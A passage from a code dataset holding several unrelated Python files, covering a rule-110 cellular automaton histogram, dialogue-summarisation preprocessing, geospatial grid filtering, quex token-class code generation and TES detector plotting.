label=\"Compact\", **kwargs)\n# # plt.xlim(50,75)\n# plt.show()\n\n\n\ninits = [\"\".join(str(i) for i in v) for v in product([0, 1], repeat=16)]\nprint(inits)\npath = os.path.expanduser(\"~/ECA_results2/rule110.json\")\nres = json.load(open(path, \"r\"))\n# trans = [int(res[i]) for i in res.keys()]\ntrans = res[\"16\"][\"transients\"]\nprint(len(trans))\nprint(np.mean(trans))\n \nhist = {}\nfor ele in trans: \n if str(ele) in hist: \n hist[str(ele)] += 1\n else : \n hist[str(ele)] = 1\n \nx = [int(i) for i in hist.keys()]\ny = [hist[i]/len(trans) for i in hist.keys()]\n \n \n \nplt.bar(x, y, color=\"darkred\")\nplt.title(f'Sampled Distribution for n={len(inits[0])}')\nplt.ylabel(\"frequency\")\n# plt.yticks(np.arange(min(values), max(values)+1, 1.0))\nplt.xlabel(\"transient length\")\nplt.show()\n\n# transients(110, inits)\n \n \n \n \n \n \n 
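\n# Hedged sanity check (a minimal sketch added for illustration, reusing the\n# f() helper defined above): np.binary_repr(110, 8) == '01101110', so the\n# rule-110 lookup table maps neighbourhood '110' -> '1' and '111' -> '0'.\ndemo_table = f(110)\nassert demo_table['110'] == '1' and demo_table['111'] == '0'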
\n","sub_path":"DDLab/antoch.py","file_name":"antoch.py","file_ext":"py","file_size_in_byte":5192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}{"seq_id":"298654976","text":"import os\nimport numpy as np\nimport pandas as pd\nimport json\n\ndef load_corpus(corpus_dir, data_name='train'):\n\n assert data_name in ['train', 'val', 'test']\n\n df = pd.read_table(os.path.join(corpus_dir, data_name+\".tsv\"), index_col=0)\n df = df.dropna(subset=['dialogue'])\n\n source_list = list(df['dialogue'].values)\n target_list = list(df['summary'].values)\n print(\"{:<5} source :\".format(data_name),len(source_list),\", target:\",len(target_list))\n\n return source_list, target_list\n\ndef check_no_newline(text_list):\n for text in text_list:\n assert \"\\r\" not in text and \"\\n\" not in text\n\ndef save_data(text_list, output_dir, data_name, mode):\n with open(os.path.join(output_dir, '{}.{}'.format(data_name, mode)), 'w') as f:\n f.write('\\n'.join(text_list))\n\ndef newline_to_sep(text_list):\n \"\"\"\n Convert newlines to [SEP] tokens.\n \"\"\"\n return [text.replace(\"\\r\\n\",\" [SEP] \").replace(\"\\n\",\" [SEP] \").replace(\"\\r\",\" [SEP] \") for text in text_list]\n\ndef dialogue_preprocess(text_list):\n \"\"\"\n [SAYS]: ':' after Speaker Names,\n [EOU] : End of Utterance(Sentence),\n [EOT] : End of a Speaker's Talk,\n\n Example:\n John [SAYS] Hi, Daive! [EOU] How are you? [EOU] [EOT] Daive [SAYS] I'm good, thanks. ([EOU] [EOT])\n \"\"\"\n\n # Delete ':' after Speaker Names and Add [SAYS] Tokens\n pp_text_list = []\n flag_full_name = False\n for text in text_list:\n word_list = []\n for word_i, w in enumerate(text.split(\" \")):\n if flag_full_name and w.endswith(':'):\n word_list.append(w[:-1])\n word_list.append(\"[SAYS]\")\n flag_full_name = False\n continue\n if \"\\r\\n\" in w or \"\\n\" in w or \"\\r\" in w or word_i==0:\n if w.endswith(':'):\n word_list.append(w[:-1])\n word_list.append(\"[SAYS]\")\n else:\n word_list.append(w)\n flag_full_name = True\n else:\n word_list.append(w)\n pp_text_list.append(\" \".join(word_list))\n \n assert len(text_list) == len(pp_text_list)\n\n # Delete Newlines\n pp_text_list = [text.replace(\"\\r\\n\",\" \").replace(\"\\n\",\" \").replace(\"\\r\",\" \") for text in pp_text_list]\n\n # Add [EOU] or [EOT] before Speaker Name\n pp2_text_list = []\n for sentence_i, text in enumerate(pp_text_list):\n w_prev = \"[NULL]\"\n speaker_prev = \"[NULL]\"\n word_list = text.split(\" \")\n acc = 0\n for word_i, w in enumerate(text.split(\" \")):\n if w == \"[SAYS]\":\n if speaker_prev != \"[NULL]\" and speaker_prev == w_prev:\n word_list[word_i-acc] = \"[EOU]\"\n word_list.pop(word_i-1-acc)\n acc += 1\n elif speaker_prev != \"[NULL]\" and speaker_prev != w_prev:\n if word_list[word_i - 2 - acc] and word_list[word_i - 2 - acc][-1].isalpha():\n word_list[word_i - 2 - acc] = word_list[word_i - 2 - acc] + \".\"\n word_list.insert(word_i - 1 - acc, \"[EOT]\")\n acc -= 1\n \n speaker_prev = w_prev\n w_prev = w\n pp2_text_list.append(\" \".join(word_list))\n \n assert len(text_list) == len(pp2_text_list)\n\n # Add [EOU] Tokens at End of Utterance(Sentence)\n pp2_text_list = [\n text.replace(\". \",\". [EOU] \")\n .replace(\"! \",\"! [EOU] \")\n .replace(\"? \",\"? 
[EOU] \") for text in pp2_text_list\n ]\n \n # Replace consecutive spaces with a single space\n pp2_text_list = [\n text.replace(\"  \",\" \")\n .replace(\"  \",\" \") for text in pp2_text_list\n ]\n \n # Add '.'(Period) and [EOU] Tokens at End of Utterance(Sentence)\n pp3_text_list = []\n for sent_i, text in enumerate(pp2_text_list):\n w_prev = \"[NULL]\"\n w_prev_prev = \"[NULL]\"\n word_list = text.split(\" \")\n acc = 0\n for word_i, w in enumerate(text.split(\" \")):\n if w == \"[EOT]\" and w_prev == \"[EOU]\" and w_prev_prev[-1].isalpha():\n word_list[word_i-2+acc] = word_list[word_i-2+acc]+\".\"\n elif w == \"[EOT]\" and w_prev[-1].isalpha():\n word_list[word_i-1+acc] = word_list[word_i-1+acc]+\".\"\n word_list.insert(word_i+acc,\"[EOU]\")\n acc += 1\n elif w == \"[EOT]\" and w_prev != \"[EOU]\":\n word_list.insert(word_i+acc,\"[EOU]\")\n acc += 1\n w_prev_prev = w_prev\n w_prev = w\n pp3_text_list.append(' '.join(word_list))\n \n assert len(text_list) == len(pp3_text_list)\n\n # Replace consecutive [EOU] tokens with a single [EOU] token\n pp4_text_list = []\n for sent_i, text in enumerate(pp3_text_list):\n w_prev = \"[NULL]\"\n word_list = text.split(\" \")\n acc = 0\n for word_i, w in enumerate(text.split(\" \")):\n if w == \"[EOU]\" and w_prev == \"[EOU]\":\n word_list.pop(word_i+acc)\n acc -= 1\n w_prev = w\n pp4_text_list.append(' '.join(word_list))\n\n assert len(text_list) == len(pp4_text_list)\n\n # Check that no consecutive [EOU] tokens remain\n for text in pp4_text_list:\n w_prev = \"[NULL]\"\n for w in text.split(\" \"):\n assert not (w == \"[EOU]\" and w_prev == \"[EOU]\")\n w_prev = w\n\n # Fix a Bit\n pp4_text_list = [text.replace(\":D.\", \":D\") for text in pp4_text_list]\n\n # Add [EOU] and [EOT] Tokens at the End of Dialogues.\n pp4_text_list = [text+\" [EOU] [EOT]\" for text in pp4_text_list]\n\n return pp4_text_list\n\ndef preprocess(corpus_dir, output_dir, dialogue=False):\n train_source_list, train_target_list = load_corpus(corpus_dir, data_name='train')\n val_source_list, val_target_list = load_corpus(corpus_dir, data_name='val')\n test_source_list, test_target_list = load_corpus(corpus_dir, data_name='test')\n\n data_list = [\n train_source_list, train_target_list,\n val_source_list, val_target_list,\n test_source_list, test_target_list,\n ]\n \n pp_data_list = []\n for text_list in data_list:\n if dialogue:\n pp_data_list.append(dialogue_preprocess(text_list))\n else:\n pp_data_list.append(newline_to_sep(text_list))\n\n for text_list in pp_data_list:\n check_no_newline(text_list)\n \n data_names = ['train', 'val', 'test']\n for i, text_list in enumerate(pp_data_list):\n data_name = data_names[int(i/2)]\n mode = 'source' if i%2==0 else 'target'\n save_data(text_list, output_dir, data_name, mode)\n","sub_path":"notebooks/.ipynb_checkpoints/preprocess-checkpoint.py","file_name":"preprocess-checkpoint.py","file_ext":"py","file_size_in_byte":6729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}{"seq_id":"379467616","text":"\"\"\"\nObjects dealing with any sort of spatial and temporal filtering of output.\n\nSpatial\n-------\n- `_find_indices` -- Find indices for a given lat/lon point on a meshgrid.\n- `extract_region` -- Directly extracts a subset of a dataset.\n\"\"\"\n\nimport numpy as np\n\ndef _find_indices(xgrid, ygrid, xpoint, ypoint):\n    \"\"\"\n    Returns the i,j index for a latitude/longitude point on a grid.\n    \n    Parameters\n    ----------\n    xgrid, ygrid : array_like, shape (`M`, `N`).\n        Longitude and latitude meshgrid.
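        Both arrays must have the same shape, e.g. as returned by numpy.meshgrid.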
\n    xpoint, ypoint : int or 1-D array_like\n        Longitude and latitude of the point being searched for on the grid. \n        Should be in the same range as the grid itself (e.g.,\n        if the longitude grid is 0-360, should be 200 instead\n        of -160)\n\n    Returns\n    ------\n    i, j : int\n        Keys for the inputted grid that lead to the lat/lon point\n        the user is seeking.\n\n    Examples\n    --------\n    >>> import esmtools as et\n    >>> import numpy as np\n    >>> x = np.linspace(0, 360, 37)\n    >>> y = np.linspace(-90, 90, 19)\n    >>> xx, yy = np.meshgrid(x, y)\n    >>> xp = 20\n    >>> yp = -20\n    >>> i, j = et.filtering._find_indices(xx, yy, xp, yp)\n    >>> print(xx[i, j])\n    20.0\n    >>> print(yy[i, j])\n    -20.0\n\n    \"\"\"\n    dx = xgrid - xpoint\n    dy = ygrid - ypoint\n    reduced_grid = abs(dx) + abs(dy)\n    min_ix = np.nanargmin(reduced_grid)\n    i, j = np.unravel_index(min_ix, reduced_grid.shape)\n    return i, j\n\ndef extract_region(ds, xgrid, ygrid, coords, lat_dim='nlat', lon_dim='nlon'):\n    \"\"\"\n    Takes in an array of data, its lon/lat grid, and coordinates pertaining\n    to the lat/lon sub-box desired and returns the extracted data. \n\n    Parameters\n    ----------\n    ds : array_like\n        Data to extract sub-region from. Ideally dataset.\n    xgrid, ygrid : array_like\n        Longitude and latitude meshgrid.\n    coords : vector\n        [x0, x1, y0, y1] pertaining to corners of box to extract\n    lat_dim, lon_dim : str (optional)\n        Names of the latitude and longitude dimensions on ds\n        (defaults 'nlat' and 'nlon')\n\n    Returns\n    ------\n    subset_data : array_like\n        Data subset to domain of interest\n    \"\"\"\n    print(\"NOTE: Make sure your coordinates are in order [x0, x1, y0, y1]\")\n    x0, x1, y0, y1 = coords\n    a, c = _find_indices(xgrid, ygrid, x0, y0)\n    b, d = _find_indices(xgrid, ygrid, x1, y1)\n    subset_data = ds.isel(**{lat_dim: slice(a, b), lon_dim: slice(c, d)})\n    return subset_data\n\n","sub_path":"esmtools/filtering.py","file_name":"filtering.py","file_ext":"py","file_size_in_byte":2443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}{"seq_id":"469264782","text":"# (C) 2005-2017 Frank-Rene Schaefer\n# ABSOLUTELY NO WARRANTY\nfrom quex.input.files.token_type import TokenTypeDescriptor\nfrom quex.engine.misc.string_handling import blue_print\nimport quex.token_db as token_db\nfrom quex.blackboard import setup as Setup, Lng\n\nfrom collections import OrderedDict\n\ndef do():\n    \"\"\"RETURNS: [0] Header text of the token class definition, or \"\".\n               [1] Implementation of the token class, or \"\".\n    \"\"\"\n    assert not Setup.converter_only_f\n\n    assert token_db.token_type_definition is not None\n\n    if token_db.token_type_definition.manually_written():\n        # User has specified a manually written token class\n        # (LexemeNull must be declared in global header)\n        header_txt         = \"\"\n        implementation_txt = \"\"\n    else:\n        # (LexemeNull is declared in token class header)\n        header_txt, \\\n        implementation_txt = _do(token_db.token_type_definition)\n\n    return header_txt, \\\n           implementation_txt\n\ndef _do(Descr):\n    txt, txt_i = _do_core(token_db.token_type_definition)\n\n    if Setup.language.upper() == \"C++\":\n        # C++: declaration and (inline) implementation in header.\n        header_txt         = \"\\n\".join([txt, txt_i])\n        implementation_txt = \"\"\n    else:\n        # C: declaration in header, implementation in source file.\n        header_txt         = txt\n        implementation_txt = txt_i \n\n    # The 'lexeme null' definition *must be* in the implementation file,\n    # unless the token class comes from outside.\n    if not Setup.extern_token_class_file:\n        if not implementation_txt:\n            
implementation_txt = \"%s\\n\" % Lng.INCLUDE(Setup.output_token_class_file)\n\n implementation_txt += extra_lib_implementations_txt\n\n return header_txt, implementation_txt\n\ndef _do_core(Descr):\n # The following things must be ensured before the function is called\n assert Descr is not None\n assert isinstance(Descr, TokenTypeDescriptor)\n\n virtual_destructor_str, \\\n copy_str, \\\n take_text_str = _some_standard_stuff(Descr)\n\n # In case of plain 'C' the class name must incorporate the namespace (list)\n if Setup.language == \"C\":\n token_class_name = Setup.token_class_name_safe\n else:\n token_class_name = Descr.class_name\n\n # ------------\n # TODO: Following should be always placed in front of footer/header:\n # ------------\n if Setup.token_class_only_f: \n helper_definitions = helper_definitions_common\n elif Setup.output_configuration_file: \n helper_definitions = Lng.INCLUDE(Setup.output_configuration_file)\n else:\n helper_definitions = \"\"\n\n if not Setup.implement_lib_quex_f:\n quex_lib_dir = \"lib/quex\"\n else:\n quex_lib_dir = \"%s/lib/quex\" % Setup.output_directory\n\n helper_variable_replacements = [\n [\"$$HELPER_DEFINITIONS$$\", helper_definitions],\n [\"$$OUTPUT_DIR$$\", Setup.output_directory],\n [\"$$QUEX_LIB_DIR$$\", quex_lib_dir],\n [\"$$NAMESPACE_OPEN$$\", Lng.NAMESPACE_OPEN(Descr.name_space)],\n [\"$$NAMESPACE_CLOSE$$\", Lng.NAMESPACE_CLOSE(Descr.name_space)],\n [\"$$TOKEN_CLASS$$\", token_class_name],\n ]\n\n template_str = Lng.open_template(Lng.token_template_file())\n txt = blue_print(template_str, [\n [\"$$BODY$$\", Lng.SOURCE_REFERENCED(Descr.body)],\n [\"$$CONSTRUCTOR$$\", Lng.SOURCE_REFERENCED(Descr.constructor)],\n [\"$$COPY$$\", copy_str],\n [\"$$DESTRUCTOR$$\", Lng.SOURCE_REFERENCED(Descr.destructor)],\n [\"$$DISTINCT_MEMBERS$$\", get_distinct_members(Descr)],\n [\"$$FOOTER$$\", Lng.SOURCE_REFERENCED(Descr.footer)],\n [\"$$FUNC_TAKE_TEXT$$\", take_text_str],\n [\"$$HEADER$$\", Lng.SOURCE_REFERENCED(Descr.header)],\n [\"$$QUICK_SETTERS$$\", get_quick_setters(Descr)],\n [\"$$SETTERS_GETTERS$$\", get_setter_getter(Descr)],\n [\"$$TOKEN_REPETITION_N_GET$$\", Lng.SOURCE_REFERENCED(Descr.repetition_get)],\n [\"$$TOKEN_REPETITION_N_SET$$\", Lng.SOURCE_REFERENCED(Descr.repetition_set)],\n [\"$$UNION_MEMBERS$$\", get_union_members(Descr)],\n [\"$$VIRTUAL_DESTRUCTOR$$\", virtual_destructor_str],\n ])\n\n template_i_str = Lng.open_template(Lng.token_template_i_file())\n txt_i = blue_print(template_i_str, [\n [\"$$INCLUDE_TOKEN_CLASS_HEADER$$\", Lng.INCLUDE(Setup.output_token_class_file)],\n [\"$$CONSTRUCTOR$$\", Lng.SOURCE_REFERENCED(Descr.constructor)],\n [\"$$COPY$$\", copy_str],\n [\"$$DESTRUCTOR$$\", Lng.SOURCE_REFERENCED(Descr.destructor)],\n [\"$$FOOTER$$\", Lng.SOURCE_REFERENCED(Descr.footer)],\n [\"$$FUNC_TAKE_TEXT$$\", take_text_str],\n [\"$$TOKEN_CLASS_HEADER$$\", token_db.token_type_definition.get_file_name()],\n [\"$$TOKEN_REPETITION_N_GET$$\", Lng.SOURCE_REFERENCED(Descr.repetition_get)],\n [\"$$TOKEN_REPETITION_N_SET$$\", Lng.SOURCE_REFERENCED(Descr.repetition_set)],\n ])\n\n txt = blue_print(txt, helper_variable_replacements)\n txt_i = blue_print(txt_i, helper_variable_replacements)\n\n if Setup.token_class_only_f:\n # All type definitions need to be replaced!\n replacements = Lng.type_replacements(DirectF=True)\n txt = blue_print(txt, replacements, \"QUEX_TYPE_\")\n txt_i = blue_print(txt_i, replacements, \"QUEX_TYPE_\")\n\n return txt, txt_i\n\nextra_lib_implementations_txt = \"\"\"\n$$INC: lexeme/basics.i$$\n$$INC: 
lexeme/converter-from-lexeme.i$$\n$$INC: quex/MemoryManager.i$$\n$$INC: quex/bom.i$$\n\n$$--------------------------------------------\nQUEX_TYPE_LEXATOM QUEX_GNAME(LexemeNull) = (QUEX_TYPE_LEXATOM)0;\n$$-----------------------------------------------------------------------------\n\"\"\"\n\n#______________________________________________________________________________\n# [MEMBER PACKAGING]\n#\n# The 'distinct_db' and 'union_db' dictionaries are not to be sorted for\n# iteration! The members need to be written in the sequence which is provided \n# by '.items()'.\n# => The ordered dictionary lists them in the sequence as when they were \n# defined. \n# => User is able to define 'packaging'.\n#______________________________________________________________________________\n\ndef get_distinct_members(Descr):\n TL = Descr.type_name_length_max()\n NL = Descr.variable_name_length_max()\n\n return \"\".join(\n __member(type_code, TL, name, NL)\n for name, type_code in Descr.distinct_db.items() # No sort! [MEMBER PACKAGING]\n )\n\ndef get_union_members(Descr):\n TL = Descr.type_name_length_max()\n NL = Descr.variable_name_length_max()\n if not Descr.union_db: return \"\"\n \n txt = [\" union {\\n\"]\n for name, type_descr in Descr.union_db.items(): # No sort! [MEMBER PACKAGING]\n if isinstance(type_descr, OrderedDict):\n txt.append(\" struct {\\n\")\n txt.extend(\n __member(sub_type, TL, sub_name, NL, IndentationOffset=\" \" * 8)\n for sub_name, sub_type in type_descr.items() # No sort! [MEMBER PACKAGING]\n )\n txt.append(\"\\n } %s;\\n\" % name)\n else:\n txt.append(\"%s\\n\" % __member(type_descr, TL, name, NL, IndentationOffset=\" \" * 4))\n txt.append(\" } content;\\n\")\n #txt += Lng._SOURCE_REFERENCE_END()\n return \"\".join(txt)\n\ndef __member(TypeCode, MaxTypeNameL, VariableName, MaxVariableNameL, IndentationOffset=\"\"):\n my_def = Lng._SOURCE_REFERENCE_BEGIN(TypeCode.sr)\n my_def += IndentationOffset\n my_def += Lng.CLASS_MEMBER_DEFINITION(TypeCode.get_pure_text(), MaxTypeNameL, \n VariableName)\n my_def += Lng._SOURCE_REFERENCE_END(TypeCode.sr)\n return my_def\n\ndef get_setter_getter(Descr):\n \"\"\"NOTE: All names are unique even in combined unions.\"\"\"\n TL = Descr.type_name_length_max()\n NL = Descr.variable_name_length_max()\n variable_db = Descr.get_member_db()\n txt = \"\"\n for variable_name, info in variable_db.items():\n type_code = info[0]\n access = info[1]\n type_str = type_code.get_pure_text()\n txt += Lng._SOURCE_REFERENCE_BEGIN(type_code.sr)\n my_def = \" %s%s get_%s() const %s{ return %s; }\" \\\n % (type_str, \" \" * (TL - len(type_str)), \n variable_name, \" \" * ((NL + TL)- len(variable_name)), \n access)\n txt += my_def\n\n type_str = type_str.strip()\n type_str = type_str.replace(\"\\t\", \" \")\n while type_str.find(\" \") != -1:\n type_str = type_str.replace(\" \", \" \")\n if type_str not in [\"char\", \"unsigned char\", \"singed char\",\n \"short\", \"unsigned short\", \"singed short\",\n \"int\", \"unsigned int\", \"singed int\",\n \"long\", \"unsigned long\", \"singed long\",\n \"float\", \"unsigned float\", \"singed float\",\n \"double\", \"unsigned double\", \"singed double\",\n \"uint8_t\", \"uint16_t\", \"uint32_t\",\n \"int8_t\", \"int16_t\", \"int32_t\",\n \"size_t\", \"uintptr_t\", \"ptrdiff_t\"]:\n type_str += \"&\"\n\n txt += Lng._SOURCE_REFERENCE_BEGIN(type_code.sr)\n my_def = \" void%s set_%s(%s Value) %s{ %s = Value; }\" \\\n % (\" \" * (TL - len(\"void\")), \n variable_name, type_str, \" \" * (NL + TL - (len(type_str) + len(variable_name))), 
\n access)\n txt += my_def\n\n txt += Lng._SOURCE_REFERENCE_END()\n return txt\n\ndef get_quick_setters(Descr):\n \"\"\"NOTE: All names are unique even in combined unions.\"\"\"\n variable_db = Descr.get_member_db()\n used_signature_list = []\n\n def __quick_setter(ArgList, used_signature_list):\n \"\"\"ArgList = [ [Name, Type], [Name, Type], ...]\n \n NOTE: There cannot be two signatures of the same type specification.\n This is so, since functions are overloaded, have the same name\n and only identify with their types.\n \"\"\"\n signature = map(lambda x: x[1].get_pure_text(), ArgList)\n if signature in used_signature_list:\n return []\n else:\n used_signature_list.append(signature)\n\n def _get_arg(info, i):\n name, type_info = info\n type_str = type_info.get_pure_text()\n if type_str.find(\"const\") != -1: type_str = type_str[5:]\n return \"const %s& Value%i\" % (type_str, i)\n\n def _get_assignment(info, i):\n name, type_info = info\n return \"%s = Value%i; \" % (variable_db[name][1], i)\n\n txt = [\n \" void set(const QUEX_TYPE_TOKEN_ID ID, \",\n \", \".join(\n _get_arg(info, i) for i, info in enumerate(ArgList)\n ),\n \")\\n { \",\n \"id = ID; \"\n ]\n txt.extend(\n _get_assignment(info, i)\n for i, info in enumerate(ArgList)\n )\n txt.append(\"}\\n\")\n\n return txt\n\n def __combined_quick_setters(member_db, used_signature_list):\n member_list = member_db.items()\n if len(member_list) == 0: return []\n\n # sort the members with respect to their occurence in the token_type section\n member_list.sort(lambda x, y: cmp(x[1].sr.line_n, y[1].sr.line_n))\n L = len(member_list)\n # build the argument list consisting of a permutation of distinct members\n arg_list = [ member_list[i] for i in range(L) ]\n\n return __quick_setter(arg_list, used_signature_list)\n\n # (*) Quick setters for distinct members\n txt = __combined_quick_setters(Descr.distinct_db, used_signature_list)\n\n # (*) Quick setters for union members\n complete_f = True\n for name, type_info in Descr.union_db.items():\n if isinstance(type_info, OrderedDict): \n setter_txt = __combined_quick_setters(type_info, used_signature_list)\n else: \n setter_txt = __quick_setter([[name, type_info]], used_signature_list)\n\n if not setter_txt: complete_f = False\n txt.extend(setter_txt)\n\n if not complete_f:\n txt.insert(0, \" /* Not all members are accessed via quick-setters (avoid overload errors). */\")\n\n return \"\".join(txt)\n\nhelper_definitions_common = \"\"\"\n/* In cases, such as DLL compilation for some dedicated compilers, \n * the classes need some epilog. If the user does not specify such\n * a thing, it must be empty. 
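 * For example, a user may define this epilog to a compiler-specific\n * DLL export attribute; if left undefined, it is defined empty below.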
*/\n#ifndef QUEX_SETTING_USER_CLASS_DECLARATION_EPILOG_EXT\n# define QUEX_SETTING_USER_CLASS_DECLARATION_EPILOG_EXT\n#endif\n\n#ifdef QUEX_OPTION_ASSERTS\n$$ # include $$\n$$ # include $$\n# define __quex_assert(X) assert(X)\n#else\n# define __quex_assert(X) /* no assert */\n#endif\n\"\"\"\n\ndef _some_standard_stuff(Descr):\n \"\"\"RETURNS: [0] virtual_destructor_str\n [1] body of the 'copy' function\n [2] body of the 'take_text' function\n \"\"\"\n virtual_destructor_str = \"\"\n if Descr.open_for_derivation_f: \n virtual_destructor_str = Lng.VIRTUAL_DESTRUCTOR_PREFIX\n\n if Descr.copy is None:\n # Default copy operation: Plain Copy of token memory\n copy_str = Lng.DEFAULT_TOKEN_COPY(\"__this\", \"__That\")\n else:\n copy_str = Lng.SOURCE_REFERENCED(Descr.copy)\n\n if Descr.take_text is None:\n take_text_str = \"%s\\n\" % Lng.RETURN_THIS(Lng.TRUE)\n else:\n take_text_str = Lng.SOURCE_REFERENCED(Descr.take_text)\n\n return virtual_destructor_str, \\\n copy_str, \\\n take_text_str\n\n\n","sub_path":"quex/output/token/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":14328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"265425731","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 29 09:44:35 2019\n\n@author: james, louise, JCH\n\"\"\"\n\nfrom __future__ import division, print_function\nimport numpy as np\nimport qubic.fibtools as ft\nfrom matplotlib.pyplot import *\nfrom pysimulators import FitsArray\nimport matplotlib.mlab as mlab\nimport scipy.ndimage.filters as f\n\n\ndef TimeSigPlot(time, dd, theTES):\n figure()\n clf()\n plot(time, dd[theTES, :])\n xlabel('Time [s]')\n ylabel('Current [nA]')\n\n return\n\n\ndef FreqResp(freq, frange, filtered_spec, theTES, fff):\n figure()\n # setup plot params\n rng = (freq > frange[0]) & (freq < frange[1])\n loglog(freq[rng], filtered_spec[rng], label='Data')\n\n # do plot\n xlim(frange[0], frange[1])\n title('Tes #{}'.format(theTES + 1))\n ylim(np.min(filtered_spec[rng]) * 0.8, np.max(filtered_spec[rng]) * 1.2)\n xlabel('Freq [Hz]')\n ylabel('Power Spectrum [$nA^2.Hz^{-1}$]')\n #### Show where the signal is expected\n for ii in range(10): plot(np.array([fff, fff]) * (ii + 1), [1e-20, 1e-10], 'r--', alpha=0.3)\n #### PT frequencies\n fpt = 1.724\n for ii in range(10): plot(np.array([fpt, fpt]) * (ii + 1), [1e-20, 1e-10], 'k--', alpha=0.3)\n\n return\n\n\n\ndef FiltFreqResp(theTES, frange, fff, filt, dd, notch, FREQ_SAMPLING, nsamples, freq, spectrum, filtered_spec):\n \"\"\"\n Plot original and notch filtered frequency.\n sigfilt requires you select for which TES you would like to\n apply the notch filter - single TES analysis\n\n \"\"\"\n # notch filter according to notch - must select TES\n\n sigfilt = dd[theTES, :]\n for i in range(len(notch)):\n sigfilt = ft.notch_filter(sigfilt, notch[i][0], notch[i][1], FREQ_SAMPLING)\n\n # get new spectrum with notch filter applied\n spectrum_f, freq_f = mlab.psd(sigfilt, Fs=FREQ_SAMPLING, NFFT=nsamples, window=mlab.window_hanning)\n\n # start plotting\n figure()\n xlim(frange[0], frange[1])\n rng = (freq > frange[0]) & (freq < frange[1])\n loglog(freq[rng], filtered_spec[rng], label='Data')\n loglog(freq[rng], f.gaussian_filter1d(spectrum_f, filt)[rng], label='Filt')\n title('Tes #{}'.format(theTES + 1))\n ylim(np.min(filtered_spec[rng]) * 0.8, np.max(filtered_spec[rng]) * 1.2)\n xlabel('Freq [Hz]')\n ylabel('Power Spectrum [$nA^2.Hz^{-1}$]')\n #### Show where the signal is expected\n for ii in 
range(10): plot(np.array([fff, fff]) * (ii + 1), [1e-20, 1e-10], 'r--', alpha=0.3)\n #### PT frequencies\n fpt = 1.724\n for ii in range(10): plot(np.array([fpt, fpt]) * (ii + 1), [1e-20, 1e-10], 'k--', alpha=0.3)\n\n return\n\n\ndef FoldedFiltTES(tt, pars, theTES, folded, folded_notch):\n figure()\n ### Plot it along with a guess for fiber signal\n plot(tt, np.mean(folded, axis=0), label='Median of Folding')\n plot(tt, folded[theTES, :], label='Data TES #{}'.format(theTES))\n plot(tt, folded_notch[theTES, :], label='Data TES #{} (with Notch filter)'.format(theTES))\n # for simsig, we should pass in 'pars' values\n plot(tt, ft.simsig(tt, pars), label='Expected')\n legend()\n ylabel('Current [nA]')\n xlabel('time [s]')\n\n return\n\n\ndef FoldedTESFreeFit(tt, bla, theTES, folded):\n figure()\n # takes in free fit result as 'bla'\n params = bla[1]\n err = bla[2]\n\n plot(tt, folded[theTES, :], label='Data TES #{}'.format(theTES))\n plot(tt, ft.simsig(tt, bla[1]),\n label='Fitted: \\n cycle={0:8.3f}+/-{1:8.3f} \\n tau = {2:8.3f}+/-{3:8.3f}s \\n t0 = {4:8.3f}+/-{5:8.3f}s \\n amp = {6:8.3f}+/-{7:8.3f}'.format(\n params[0], err[0], params[1], err[1], params[2], err[2], params[3], err[3]))\n legend()\n ylabel('Current [nA]')\n xlabel('time [s]')\n title('TES {} folded with simsig params'.format(theTES))\n\n return\n\n\ndef Allplots(fib, allparams, allparams1, allparams2, okfinal, okfinal1, okfinal2, asic, med=False, rng=None,\n cmap='viridis'):\n figure()\n\n subplot(2, 2, 1)\n mmt, sst = ft.meancut(allparams[okfinal, 1], 3)\n hist(allparams[okfinal, 1], range=[0, mmt + 4 * sst], bins=15,\n label='All ({}) '.format(okfinal.sum()) + ft.statstr(allparams[okfinal, 1] * 1000, median=med) + ' ms',\n alpha=0.5)\n hist(allparams1[okfinal1, 1], range=[0, mmt + 4 * sst], bins=15,\n label='Asic1 ({})'.format(okfinal1.sum()) + ft.statstr(allparams1[okfinal1, 1] * 1000, median=med) + ' ms',\n alpha=0.5)\n hist(allparams1[okfinal2, 1], range=[0, mmt + 4 * sst], bins=15,\n label='Asic2 ({})'.format(okfinal2.sum()) + ft.statstr(allparams2[okfinal2, 1] * 1000, median=med) + ' ms',\n alpha=0.5)\n xlabel('Tau [sec]')\n legend(fontsize=7, frameon=False)\n title('Fib {} - Tau [s]'.format(fib))\n\n subplot(2, 2, 2)\n mma, ssa = ft.meancut(allparams[okfinal, 3], 3)\n hist(allparams[okfinal, 3], range=[0, mma + 4 * ssa], bins=15,\n label='All ({}) '.format(okfinal.sum()) + ft.statstr(allparams[okfinal, 3], median=med) + ' nA', alpha=0.5)\n hist(allparams1[okfinal1, 3], range=[0, mma + 4 * ssa], bins=15,\n label='Asic1 ({}) '.format(okfinal1.sum()) + ft.statstr(allparams1[okfinal1, 3], median=med) + ' nA',\n alpha=0.5)\n hist(allparams1[okfinal2, 3], range=[0, mma + 4 * ssa], bins=15,\n label='Asic2 ({}) '.format(okfinal2.sum()) + ft.statstr(allparams2[okfinal2, 3], median=med) + ' nA',\n alpha=0.5)\n xlabel('Amp [nA]')\n legend(fontsize=7, frameon=False)\n title('Fib {} - Amp [nA]'.format(fib))\n\n subplot(2, 2, 3)\n imtau = ft.image_asics(data1=allparams1[:, 1], data2=allparams2[:, 1])\n imshow(imtau, vmin=0, vmax=mmt + 4 * sst, interpolation='nearest', cmap=cmap)\n title('Tau [s] - Fiber {}'.format(fib, asic))\n colorbar()\n\n subplot(2, 2, 4)\n imamp = ft.image_asics(data1=allparams1[:, 3], data2=allparams2[:, 3])\n imshow(imamp, vmin=0, vmax=mma + 4 * ssa, interpolation='nearest', cmap=cmap)\n title('Amp [nA] - Fiber {}'.format(fib, asic))\n colorbar()\n tight_layout()\n return\n\n\ndef TESvsThermo(fib, tt, folded1, folded2, okfinal1, okfinal2, thermos):\n figure()\n subplot(2, 1, 1)\n plot(tt, 
